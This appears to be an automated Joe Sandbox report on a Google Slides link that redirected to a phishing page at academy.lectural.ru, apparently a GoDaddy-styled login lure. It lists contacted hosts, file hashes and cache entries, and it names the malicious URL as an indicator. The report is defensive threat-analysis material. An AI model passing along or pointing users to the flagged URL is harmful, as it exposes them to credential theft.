Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	2 Application Layer Protocol			Data Encrypted for Impact	DNS Server	Email Addresses

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
https://docs.google.com/presentation/d/e/2PACX-1vRFdNDen2Cuau5Sd4hRbUB9z7CUXInCHahSGLKpkrJHFJTTcyO1k9DiRmN4f7de2CeEYwMzbLc6Mqd5/pub?start=false&loop=false&delayms=3000	0%	Avira URL Cloud	safe
https://docs.google.com/presentation/d/e/2PACX-1vRFdNDen2Cuau5Sd4hRbUB9z7CUXInCHahSGLKpkrJHFJTTcyO1k9DiRmN4f7de2CeEYwMzbLc6Mqd5/pub?start=false&loop=false&delayms=3000	0%	Virustotal		Browse

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
cs1100.wpc.omegacdn.net	0%	Virustotal		Browse
aadcdn.msftauth.net	0%	Virustotal		Browse
part-0012.t-0009.t-msedge.net	0%	Virustotal		Browse
part-0013.t-0009.t-msedge.net	0%	Virustotal		Browse

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
docs.google.com	74.125.136.139	true	false		high
cs1100.wpc.omegacdn.net	152.199.4.44	true	false	0%, Virustotal, Browse	unknown
accounts.google.com	74.125.138.84	true	false		high
adfs.heart.org	69.152.183.140	true	false		high
part-0013.t-0009.t-msedge.net	13.107.213.41	true	false	0%, Virustotal, Browse	unknown
play.google.com	173.194.219.139	true	false		high
academy.lectural.ru	172.67.185.34	true	false		unknown
code.jquery.com	151.101.130.137	true	false		high
d2vgu95hoyrpkh.cloudfront.net	99.84.108.67	true	false		high
challenges.cloudflare.com	104.17.3.184	true	false		high
www.google.com	172.253.124.106	true	false		high
part-0012.t-0009.t-msedge.net	13.107.246.40	true	false	0%, Virustotal, Browse	unknown
clients.l.google.com	142.250.105.100	true	false		high
httpbin.org	3.224.157.95	true	false		high
clients1.google.com	unknown	unknown	false		high
aadcdn.msftauth.net	unknown	unknown	false	0%, Virustotal, Browse	unknown
cdn.socket.io	unknown	unknown	false		high
clients2.google.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/t6d4c/0x4AAAAAAAP_i6gQuctZA-D5/auto/normal	false		high
https://docs.google.com/presentation/d/e/2PACX-1vRFdNDen2Cuau5Sd4hRbUB9z7CUXInCHahSGLKpkrJHFJTTcyO1k9DiRmN4f7de2CeEYwMzbLc6Mqd5/pub?start=false&loop=false&delayms=3000&slide=id.p	false		high
https://academy.lectural.ru/3t6837t/	true		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
13.107.246.40	part-0012.t-0009.t-msedge.net	United States		8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
3.224.157.95	httpbin.org	United States		14618	AMAZON-AESUS	false
64.233.176.94	unknown	United States		15169	GOOGLEUS	false
172.253.124.106	www.google.com	United States		15169	GOOGLEUS	false
173.194.219.94	unknown	United States		15169	GOOGLEUS	false
151.101.130.137	code.jquery.com	United States		54113	FASTLYUS	false
104.17.3.184	challenges.cloudflare.com	United States		13335	CLOUDFLARENETUS	false
108.177.122.139	unknown	United States		15169	GOOGLEUS	false
69.152.183.140	adfs.heart.org	United States		7018	ATT-INTERNET4US	false
13.107.213.41	part-0013.t-0009.t-msedge.net	United States		8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
172.217.215.94	unknown	United States		15169	GOOGLEUS	false
172.67.185.34	academy.lectural.ru	United States		13335	CLOUDFLARENETUS	false
74.125.138.94	unknown	United States		15169	GOOGLEUS	false
64.233.177.94	unknown	United States		15169	GOOGLEUS	false
1.1.1.1	unknown	Australia		13335	CLOUDFLARENETUS	false
142.250.105.94	unknown	United States		15169	GOOGLEUS	false
142.250.105.95	unknown	United States		15169	GOOGLEUS	false
99.84.108.67	d2vgu95hoyrpkh.cloudfront.net	United States		16509	AMAZON-02US	false
74.125.136.139	docs.google.com	United States		15169	GOOGLEUS	false
152.199.4.44	cs1100.wpc.omegacdn.net	United States		15133	EDGECASTUS	false
142.250.105.100	clients.l.google.com	United States		15169	GOOGLEUS	false
173.194.219.102	unknown	United States		15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved		unknown	unknown	false
173.194.219.139	play.google.com	United States		15169	GOOGLEUS	false
64.233.185.95	unknown	United States		15169	GOOGLEUS	false
108.177.122.94	unknown	United States		15169	GOOGLEUS	false
74.125.138.84	accounts.google.com	United States		15169	GOOGLEUS	false
104.17.2.184	unknown	United States		13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.16

General Information

Joe Sandbox version:	38.0.0 Ammolite
Analysis ID:	1379290
Start date and time:	2024-01-23 07:18:54 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsinteractivecookbook.jbs
Sample URL:	https://docs.google.com/presentation/d/e/2PACX-1vRFdNDen2Cuau5Sd4hRbUB9z7CUXInCHahSGLKpkrJHFJTTcyO1k9DiRmN4f7de2CeEYwMzbLc6Mqd5/pub?start=false&loop=false&delayms=3000
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled
Analysis Mode:	stream
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal52.phis.win@18/133@40/281

Warnings

Exclude process from analysis (whitelisted): SIHClient.exe
Excluded IPs from analysis (whitelisted): 74.125.138.94, 34.104.35.123, 142.250.105.95, 64.233.176.94, 108.177.122.94, 172.217.215.94
Excluded domains from analysis (whitelisted): fonts.googleapis.com, ssl.gstatic.com, edgedl.me.gvt1.com, fonts.gstatic.com, clientservices.googleapis.com
Not all processes where analyzed, report is missing behavior information

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 23 05:19:26 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2673
Entropy (8bit):	3.9790105682232375
Encrypted:	false
SSDEEP:
MD5:	F484FD38EEBA3E57DD2500FA3E8E2882
SHA1:	B60D16F4CB7664A223EC716D617D6B673F9A2655
SHA-256:	BD2EAC23218D3A45BF8960CEA74DC8BA830A8355C967AB2C99A0D67DE0D91EA1
SHA-512:	3D17FDB4C0BC4163A36E6D2CC65298063831900E04F975D88F512D51CD5D334ABDA102FD4230E8FC72E113D7D8F82F8ED4DA9821474B49C775CCF3FC2DED80F2
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,.........M..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I7Xd2....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V7Xl2....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V7Xl2....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V7Xl2..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V7Xn2...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............2......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 23 05:19:26 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2675
Entropy (8bit):	3.994115462375941
Encrypted:	false
SSDEEP:
MD5:	14F37A4FE237060EC932E7C49C560ECA
SHA1:	A58A17D6513DC636853C05691B232137065B0485
SHA-256:	40187AC875324052F1DA76206DA4D90B76A3FFABF435F0AB6605F4CB6DE4AA3D
SHA-512:	8FBECAF224AA2701717308F49EA0D32797A669173757F868CE1F65E37F8F64D06FF190A4B7791522ABB4917B82605CB9650EF2CEB52D1752A646F940D31D93CE
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,......}..M..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I7Xd2....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V7Xl2....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V7Xl2....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V7Xl2..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V7Xn2...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............2......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2689
Entropy (8bit):	4.002819404724401
Encrypted:	false
SSDEEP:
MD5:	EA46A0F2042BE526968181754D73C404
SHA1:	267168E0EF97B51ADDFAE0F03E4D01F1A1CCB728
SHA-256:	331AFA9FC001A04495C9A17A6EA286DAE1891455C0350C6F07945CC4FE3B939B
SHA-512:	33BCF9EE79E0EBDA47DA85C0C7308C6912549E6424A76C5F48CA0ECFD263E97C8DB39CBACB6498136C4AAEC39E8521C82E2DD5C41D69616095CE4F6C0F01A61E
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I7Xd2....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V7Xl2....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V7Xl2....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V7Xl2..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............2......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 23 05:19:26 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.993161890814079
Encrypted:	false
SSDEEP:
MD5:	07BC8F87AC1386E0CA62744518A9B965
SHA1:	A2C1A816F44822AF3A450C53F647389E305F6103
SHA-256:	31141F88169083B4E4CD7F736B0616ED6E49AD859DA63B3B5627B0ECCB2A48ED
SHA-512:	E2C1B68E34366FA5B026BC0EB2BC57E92CFCB359A25D5F36E06A8C5C64190CE1A9F2271116638D2E08335878F04D48D7C4ACF647E8E2A1580AB3F42C3B650A39
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,......v..M..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I7Xd2....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V7Xl2....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V7Xl2....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V7Xl2..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V7Xn2...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............2......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 23 05:19:26 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.9784226458611305
Encrypted:	false
SSDEEP:
MD5:	AC209A2ACAE544E684AE1A7F9C05A23D
SHA1:	F660C7450D1DD436D7D03BA289C54A0530C02DC8
SHA-256:	2BE2B1D0B92B338C46C426E96614061CFCDE83F134D49F11FA324A0DFB615F5E
SHA-512:	0DA4879463A3F761C40BFB47DCDE5C814D02B9BFC9761EC58CE4BE3FE1F0C9139C36ED5D6CBDF08F49AE768389851F94098A0D527AAEF1CDF534296049D17469
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,....gk...M..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I7Xd2....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V7Xl2....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V7Xl2....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V7Xl2..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V7Xn2...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............2......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 23 05:19:26 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2679
Entropy (8bit):	3.991292284663459
Encrypted:	false
SSDEEP:
MD5:	849B6764C5663FD930C34E306C40C282
SHA1:	BD1DD16C3D6EEF82D271E46730AEBE45C9A7A51E
SHA-256:	34BD55B42DD9D4EAC3A2F457FB49B1C663617A7C91F26CF0BF2E35132C90005D
SHA-512:	85968F47BDA5435D49936FB52F01473B5C5CC515478C48C4212F3FB7CB3783979588EC65767D021B6BA10EDB7B9900A70AFCCB92747B2568EBC438903982D15A
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,.....zj..M..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I7Xd2....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V7Xl2....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V7Xl2....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V7Xl2..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V7Xn2...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............2......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

Chrome Cache Entry: 101

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (1437), with CRLF line terminators
Category:	downloaded
Size (bytes):	38221
Entropy (8bit):	5.115310431318543
Encrypted:	false
SSDEEP:
MD5:	0A40B289B9ECB589387F31CBD2807033
SHA1:	DBB02F7D438A952B55CAB142749C648CD6417AF5
SHA-256:	C17E32E67EDC46C2720B01A4A716996809AD8335C875F6980319A1440DE6C245
SHA-512:	FACA0A6D1D4202A89B79C81BABA0317438D140917E29EEAD72CC3A0B3E9B4E096AB3B2989BB3C16CF2D8747FF487170AFD0B67D88CC251D72C9F4933476E0362
Malicious:	false
Reputation:	low
URL:	https://academy.lectural.ru/web6/assets/css/pages-godaddy.css
Preview:	@font-face{font-family: 'gdsherpa';font-weight: 700;src: url('/web6/assets/fonts/GDSherpa-bold.woff2') format('woff2'),url('/web6/assets/fonts/GDSherpa-bold.woff') format('woff');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family: 'gdsherpa';font-weight: 400;src: url('/web6/assets/fonts/GDSherpa-regular.woff2') format('woff2'),url('/web6/assets/fonts/GDSherpa-regular.woff') format('woff');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family: 'gdsherpa';font-weight: 1 999;src: url('/web6/assets/fonts/GDSherpa-vf.woff2') format('woff2'),url('/web6/assets/fonts/GDSherpa-vf.woff2') format('woff2-variations');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family: 'gdsherpa';font-weight: 1 900;src: url('/web6/assets/fonts/GDSherpa-vf2.woff2') format('woff2'),url('/web6/assets/fonts/GDSherpa-vf2.woff2') format('woff2-variations');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family: 'gd-sage';font-weight: 700;src: url('/web6/ass

Chrome Cache Entry: 102

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	61
Entropy (8bit):	3.990210155325004
Encrypted:	false
SSDEEP:
MD5:	9246CCA8FC3C00F50035F28E9F6B7F7D
SHA1:	3AA538440F70873B574F40CD793060F53EC17A5D
SHA-256:	C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
SHA-512:	A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR...............s....IDAT.....$.....IEND.B`.

Chrome Cache Entry: 104

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 268
Category:	dropped
Size (bytes):	212
Entropy (8bit):	6.892082645537822
Encrypted:	false
SSDEEP:
MD5:	A454145E295493362D21BBD2C0681505
SHA1:	B1811BBE70070D200C413B105FCB6DEE77D3BB8C
SHA-256:	34BA4E54107E71C7BF7FE7F5820AE4B76E8EF39022C1BE88D439799619F117AB
SHA-512:	49AD111C0A0E159C7B8D3500252BEB87401CBAC006FBE16B47290C388D2947E87F195743F5A84669BA09B5ABCA0ED8FABACA3E0FD88BDED5BE6067A17CEF8E83
Malicious:	false
Reputation:	low
Preview:	..........u.1o.!.....+...TpC...5C........V../.S........<F..Ns.<......j.r......8..B)pt....D..../....C...2M.?...x.).._...;OS..2G.z.;Sb.....5.u'.6......h.;Ys....~m#.A........4.........../..a.5s}...I.vC....

Chrome Cache Entry: 105

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (45667)
Category:	downloaded
Size (bytes):	45806
Entropy (8bit):	5.207605835316031
Encrypted:	false
SSDEEP:
MD5:	80F5B8C6A9EEAC15DE93E5A112036A06
SHA1:	F7174635137D37581B11937FC90E9CB325077BCE
SHA-256:	0401DE33701F1CAD16ECF952899D23990B6437D0A5B7335524EDF6BDFB932542
SHA-512:	B976A5F02202439D94C6817D037C813FA1945C6BB93762284D97FF61718C5B833402F372562034663A467FDBAA46990DE24CB1E356392340E64D034E4BA1B4E4
Malicious:	false
Reputation:	low
URL:	https://cdn.socket.io/4.6.0/socket.io.min.js
Preview:	/!. Socket.IO v4.6.0. * (c) 2014-2023 Guillermo Rauch. * Released under the MIT License.. */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):(t="undefined"!=typeof globalThis?globalThis:t\|\|self).io=e()}(this,(function(){"use strict";function t(e){return t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t},t(e)}function e(t,e){if(!(t instanceof e))throw new TypeError("Cannot call a class as a function")}function n(t,e){for(var n=0;n<e.length;n++){var r=e[n];r.enumerable=r.enumerable\|\|!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(t,r.key,r)}}function r(t,e,r){return e&&n(t.prototype,e),r&&n(t,r),Object.defineProperty(t,"prototype",{writable:!1}),t}function i(){return i=Object.assign?Object.assign.bind():function(t){for(var e=

Chrome Cache Entry: 106

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	3
Entropy (8bit):	0.9182958340544896
Encrypted:	false
SSDEEP:
MD5:	4F4ADCBF8C6F66DCFC8A3282AC2BF10A
SHA1:	C35A9FC52BB556C79F8FA540DF587A2BF465B940
SHA-256:	6B3C238EBCF1F3C07CF0E556FAA82C6B8FE96840FF4B6B7E9962A2D855843A0B
SHA-512:	0D15D65C1A988DFC8CC58F515A9BB56CBAF1FF5CB0A5554700BC9AF20A26C0470A83C8EB46E16175154A6BCAAD7E280BBFD837A768F9F094DA770B7BD3849F88
Malicious:	false
Reputation:	low
Preview:	404

Chrome Cache Entry: 107

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 108 x 24, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	1400
Entropy (8bit):	7.808470583085035
Encrypted:	false
SSDEEP:
MD5:	333EE830E5AB72C41DD9126A27B4D878
SHA1:	12D8D66EBB3076F3D6069E133C3212F97C8774E1
SHA-256:	8702292CBC365E9F0488143E2B309B85EFE09C61FD2E0A2E21C53735A309313C
SHA-512:	3413ED624241877C1D44FEE23FD37745CB214C12AE73FACFAFA07B47FA1CB9E5DAA3CB7F542564E04075FFE8BA744C962FBDD78F08A643A90C0EC1118C05BBF8
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR...l................?IDAThC.X.n.A..K.. ..H8.....7P..p...&......>..4.'.y.`$Z...$1..9..;...w.\|...zvvv.............b..Y....B...Dq..&\....pe..r.X.P...3.n...M.j.....+..r}}.t:...fa.mmm5U........)dwww...j...q<<<<L.}ggg.......k.O.?....^.gE.6....B..%U..w#H...y....~......h.....Q.E;.....T...E.W..X=..{.;..+.. ..`.(:2...A..U.....Y....z..l.r.S..<K...x.E.... .....U.,.`.....<::............MSiE.2w.!z.T...PWl.).0...Z....Z.'~.5zP.o..-. ......q..x..w.....y......5\|v..i...........@w.c...j..3....w,/.3.).....u.......b.}..R........ `......`mH$.U..B.H1...jx..3..$k ...........Z......4....A.>..X.a/...0N.&?q..........F#w&o."L:...l.c...x.P...@e..&.&\|Y...!.i....gac..1C.....I..t...e~q.&.6.2B.}.V.p.B.."...'..M..s.s.....V%-.?8yC.?m......z...&]\.VN.s....j.`....kY.....64.Y..(_ea[.r...1B.......5....i.u.......aQ.+z.x.......<,~..a...z,.I.T.b.P.^.`...y.58..,\|Q...u.-.._....m.1...\|k.j.7.,x.....X....ez..a....X...\E.$..-...s.../.9L.9.(9..U...x$#.C...Nm...p.....J...

Chrome Cache Entry: 108

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 4 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
Category:	dropped
Size (bytes):	24177
Entropy (8bit):	2.600128307982013
Encrypted:	false
SSDEEP:
MD5:	5A0EB0DCD9EE0EECD82FB9A75AC67677
SHA1:	99C103FF8EFFC753757E90F14AE73526F4124F66
SHA-256:	1D2B1BF6C2921393F0EEB1B21613BB9E1C9144DFDA918306EF99DBF0D9D2AEE4
SHA-512:	8BC453A194708858AB81AC1048847848E99FE61198FFEBF32BDCDEB34DEDAE4FFAC9242633A7A6665E493E5DD2C60F97CB038B95CF3CB2C6A9C2B0CC3D622355
Malicious:	false
Reputation:	low
Preview:	............ .h...F... .... .........@@.... .(B..V......... .....~W..(....... ..... ............................`...........................................................`..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Chrome Cache Entry: 109

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	116
Entropy (8bit):	4.729742619433357
Encrypted:	false
SSDEEP:
MD5:	DB062A34B230B42D0E50E12980B7AD0A
SHA1:	5A43FE2BFE0F83DA71A22DB99B0C637F8ACAC3EF
SHA-256:	7F74DA43E9F04FEEBB4DCC9628DF1ACA01817809270B5FB34674A6CA0A0BE558
SHA-512:	19E2226EE07D6D6228CA5875189E3090DD9C95CF24DBE50CFD3396975B333A9DD0D4CFD118FBD276AB30FA36E2F1BE4691F97C1CFB276B1C63414A3A056EF409
Malicious:	false
Reputation:	low
